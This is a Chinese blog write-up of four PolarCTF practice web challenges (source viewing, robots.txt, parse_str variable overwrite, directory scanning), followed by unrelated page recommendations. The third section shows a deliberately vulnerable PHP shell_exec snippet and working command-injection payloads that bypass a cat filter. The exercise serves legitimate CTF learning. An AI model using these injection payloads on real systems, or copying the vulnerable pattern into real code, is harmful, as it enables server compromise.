polarctf靶场[WEB]Don‘t touch me、机器人、uploader、扫扫看

已于 2024-08-25 13:01:06 修改
阅读量500 收藏 7
点赞数 10
分类专栏: polarctf靶场 wp 文章标签: 前端 android 变量覆盖 CTF robot协议 网络安全 web
于 2024-08-25 13:00:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73981089/article/details/141504133
版权

目录

[web]Don't touch me

考点:查看源代码、前端

[web]机器人

考点:robot协议

工具:御剑,kali dirsearch

[web]覆盖

考点:@parse_str覆盖

[web]扫扫看

考点:目录扫描

工具:御剑、kali dirsearch

[web]Don't touch me

考点:查看源代码、前端

打开网页,叫我们找flag

 我们打开源代码,发现了一个被注释的子域

访问,是另一个界面 

在看源代码 ,发现有个3.php,点开

就可以发现了被注释的flag文件,fla.php

访问,得到本题flag 

[web]机器人

考点:robot协议

工具:御剑,kali dirsearch

题目说是机器人,所以考虑是robots协议

当robots访问一个网站(比如http://www.abc.com)时,首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件,如果机器人找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围。(也就相当于一个管理权限的文件)
robots.txt文件用法举例:
User-agent(搜索引擎robots的名字):*(*代表所有)
Disallow(以Disallow开头的url都禁止访问):/(代表禁止所有引擎访问网站任何部分)
例:
User-agent:baiduspider
Disallow:
User-agent:*
Disallow:/
代表允许baiduspider来访问网站任何,其他都不行 

进入robots.txt文件查看一下权限或者被隐藏了哪些,或者不确定访问什么可以用御剑或者kali 的dirsearch工具进行目录扫描

看到了一部分的flag,再看Disallow,应该是个目录

访问/27f5e15b6af3223f1176293cd015771d/flag.php

得到另一部分的flag,拼接一起便可得到flag

 

[web]覆盖

考点:@parse_str覆盖

 <?php
error_reporting(0);
if (empty($_GET['id'])) {
    show_source(__FILE__);
    die();
} else {
    include 'flag.php';
    $a = "www.baidu.com";
    $result = "";
    $id = $_GET['id'];
    @parse_str($id);
    echo $a[0];
    if ($a[0] == 'www.polarctf.com') {
        $ip = $_GET['cmd'];
        $result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
        if ($result) {
            echo "<pre>{$result}</pre>";
        }
    } else {
        exit('其实很简单!');
    }
}

这段代码是一个简单的 PHP 网页应用,主要功能是根据特定条件执行命令并返回结果。如果没有提供 id 参数,就显示当前文件的源代码并终止程序。如果提供了 id 参数,并且通过特定方式将变量 $a 的第一个字符修改为 www.polarctf.com,同时提供 cmd 参数,就会执行 ping 命令并返回结果。

@parse_str($id);:这个函数不会检查变量 $id 是否存在,如果通过其他方式传入数据给变量$id ,且当前$id中数据存在,它将会直接覆盖掉

$result.= shell_exec('ping -c 2 '. $a[0]. $ip);:使用 shell_exec 函数执行 ping 命令,向 "www.polarctf.com" 和变量 $ip 指定的地址发送两个 ICMP 数据包,并将结果存储在变量 $result 中。

发现a[0]的值确实被更改了,那么接下来就简单了,先构造一个cmd=|ls;,发现回显了flag.php,但是不能直接读取,我们尝试用读取ls的命令,而且cat似乎被覆盖过滤了,所以我们使用tac。

有集中方法进行构造:

?id=a[0]=www.polarctf.com&cmd=|tac `ls`;//回显之后直接可得到flag
 
?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;tac%20flag*
或?id=a[0]=www.polarctf.com&cmd=;tac%20fl''ag.php
?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag

 

得到本题的flag 

如果还想练习相同知识点,在相同的靶场也有类似的题目干正则该题的wp:https://blog.csdn.net/m0_73981089/article/details/138520071

[web]扫扫看

考点:目录扫描

工具:御剑、kali dirsearch

网页显示“或许你该扫一扫”,所以我们使用御剑或者kali dirsearch工具扫一扫

这里使用kali dirsearch扫

dirsearch -u 网址 -e* 

访问该子域,进入此页面

 点击查看源代码

得到本题的flag

剁椒排骨
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web Uploader学习总结
李清的博客
12-14 4136
        WebUploader是由Baidu WebFE(FEX)团队开发的一个简单的以HTML5为主,FLASH为辅的现代文件上传组件。本文主要介绍如何使用该组件实现对图片文件的上传下载和图片回显。本文基于webuploader-0.1.5版本介绍该组件js实现部分。 一、官网Demo说明:         解压官网下载下来的压缩包,打开webuploader-0.1.5/examp...
Web Uploader文件(图片)上传使用方法
滑稽又了色*的博客
05-15 2186
Web Uploader文件(图片)上传前言html页面Web Uploader上传jsWeb Uploader总结(遇到的坑)结尾 前言 Web Uploader是上传问价和图片的一种实现方式,Web Uploader是一套的成熟且完善的上传插件js。具体api可以在官网查看。 http://www.jq22.com/yanshi2665 html页面 在页面可以给按钮或者a标签,具体看项目需要...
web uploader 删除图片 及样式实现
qq_33842795的博客
06-25 6012
定义webuploader.css 文件 .webuploader-container { position: relative; } .webuploader-element-invisible { position: absolute !important; clip: rect(1px 1px 1px 1px); /* IE6, IE7 */ clip: rec...
微信小程序uploader上传文件并提交表单数据完整案例(接口框架WebAPI)
留白空间
07-30 1万+
文章目录写在前面的话uploader介绍用法与代码小程序前端后台接口 WebAPI采坑记录 写在前面的话 最近又自己在折腾微信小程序了。最新的一个功能中需要实现图片上传。幸运的是,微信小程序扩展能力中有现成的文件上传组件uploader可以使用,而不幸的是,这个组件坑实在太多了,而我又不是单纯的文件上传,还需要同步上传表单数据,因此各种坑,要么就是数据传不过去,要么就是后台取不到数据,折腾了我一天,各种尝试,终于搞定了。前后端完整用法记录一下,希望大家都能快速上手~ uploader介绍 uploader
Web Uploader基本用法
仁者无敌的博客
01-16 2318
WebUploader是由Baidu WebFE(FEX)团队开发的一个简单的以HTML5为主,FLASH为辅的现代文件上传组件。
解决Web Uploader上传文件和图片 延迟和not defined
24号同学的博客
01-15 7346
1.出现list not define时,var $list = $("#fileList"); 2.选择文件框有延迟,可能是因为选择文件类型过多 mimeTypes: 'image/*' 改为 mimeTypes: 'image' 3.thumbnailWidth x thumbnailHeight 改为自己想要的尺寸 引入资源 使用Web Uploader
Web Uploader学习及使用
qzz12345的博客
03-19 8895
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Web Uploader学习及使用 前言 Web Uploader百度插件的使用:Web Uploader是一个高效的文件上传组件,网址链接为:[Web Uploader百度插件(http://fex.baidu.com/webuploader/) 一、具体使用 1.引入库 使用Web Uploader文件上传需要引入三种资源:JS, CSS, SWF。 <!--引入CSS--> <link rel="styleshe.
Web uploader上传word,pdf实例
SwordRed的博客
08-24 1万+
看了许多,终于自己做了一个。废话不说,直接上代码html部分<div id="uploader" class="wu-example"> <!--用来存放文件信息--> <div id="thelist" class="uploader-list"></div> <div class="btns"> <div id="picker">选择文件</div>
百度上传组件web uploader介绍+快速入门案例
热门推荐
Creabine的博客
03-25 2万+
百度上传组件web uploader入门公司的项目需要文件上传的功能,之前使用的是SWFUpload这个上传组件,我将其替换成了web uploader。 SWFUpload组件SWFUpload 最初是Vinterwebb.se 开发的客户端文件上传工具。它联合javascript和flash,在浏览器中提供一个优于传统上传标签 的功能(和良好的用户体验)。SWFUpload 的主要特性:文件浏
libcurl web-uploader 文件分片上传,断点续传
02-09
《libcurl web-uploader:文件分片上传与断点续传技术详解》 在现代互联网应用中,大文件上传已经成为常见的需求,而libcurl作为一款强大的URL传输库,提供了丰富的功能,包括文件分片上传和断点续传,使得开发者...
Web Uploader
08-06
Web Uploader是一款强大的前端文件上传组件,尤其适合初次接触文件上传功能的开发者。这款插件在Web应用中提供了高效、灵活且用户友好的文件上传解决方案。它的核心特性包括多文件选择、进度条显示、预览功能以及...
Web Uploader文件上传插件使用详解
09-02
Web Uploader的特点在于其灵活的分片并发上传机制,可以极大地提高大文件的上传效率,同时具备文件预览、压缩、多途径添加文件等功能。 1. **分片并发上传**:Web Uploader将大文件分割成多个小分片并行上传,一旦...
web uploader 写的demo.
11-08
Web Uploader 是一个强大的前端文件上传组件,尤其适用于Web应用中的大文件上传场景。这个组件以其高效的性能、灵活的配置和丰富的API,使得开发者能够轻松地实现用户界面友好的文件上传功能。在“web uploader 写的...
百度web uploader批量文件上传(测试程序,可用)
11-04
【百度Web Uploader批量文件上传】是一个强大的JavaScript文件上传组件,尤其适用于Web应用程序中的大文件上传和批量上传场景。这个测试程序是基于ASP.NET平台,适用于Visual Studio 2013开发环境,提供了完整的预览...
【js】各类前端输入校验方法
galaxyJING的博客
08-21 356
【代码】【js】各类前端输入校验方法。
vue中定义一个url文件,在vue文件中引入
最新发布
weixin_65767506的博客
08-22 281
1.在src/utils文件夹下创建一个url.js。3.在其他vue文件中引入。2.url.js的内容为。4.在挂载时打印一下。打印出来就可以用了.
浅谈JavaScript 框架在现代 Web 开发中的作用
08-21 523
随着近年来 Web 开发的快速发展,JavaScript 框架已成为用于构建任何应用程序的强大、灵活和可扩展元素的重要实用程序。一些框架,如Angular、React、Vue.JS等,有助于以系统的方式处理固有的网站开发复杂性,以提高效率。它们提供已经为基本编程功能和常规任务编写的 JavaScript 代码,从而缩短了必要的原始编码时间。此外,它们还增加了 Web 应用程序的功能和交互性,从...
【IC前端虚拟项目】用例的完善与补充
moon9999的博客
08-20 99
当然只不过是参考,个人不建议在寄存器测试这个环节投入太多的经历,也没有必要非在环境中讲寄存器模型以seq方式呈现,只要用起来方便就是最合适的。如果之后在实际的项目中寄存器模型时通过seq的方式集成到环境中的(比如我现在负责的项目,验证环境就是如此),那么转换过来也是没有什么难度的,这点大可放心。此外,在组织更多随机用例的过程中可以练习多种不同约束的transaction以不同的比例关系通过同一个seq/sqr uvm_do的操作。好了,具体的用例大家可以参考我的代码,尽量以自己的思路来进行扩充。
Web Uploader 初始化为什么报me.connectRuntime is not a function错误
05-05
该错误通常是因为 Web Uploader 的版本问题导致的。 首先,确保使用的 Web Uploader 版本是最新的。如果不是最新的,可以尝试更新版本。 如果更新版本后仍然出现该错误,可能是因为您的代码中没有正确引入 Web Uploader 的相关文件,或者因为 Web Uploader 的一些依赖项没有正确加载。请确保您在 HTML 文件中正确引入了 Web Uploader 的 CSS 和 JavaScript 文件,并且没有缺少任何依赖项。 另外,如果您使用的是 AMD 或 CommonJS 模块加载器,请确保正确配置了 Web Uploader 的模块加载器,以便它能够正确加载所需的依赖项。 最后,如果您仍然无法解决该问题,请尝试在 Web Uploader 的 GitHub 仓库中搜索该错误,并查看是否有相关的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒排骨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值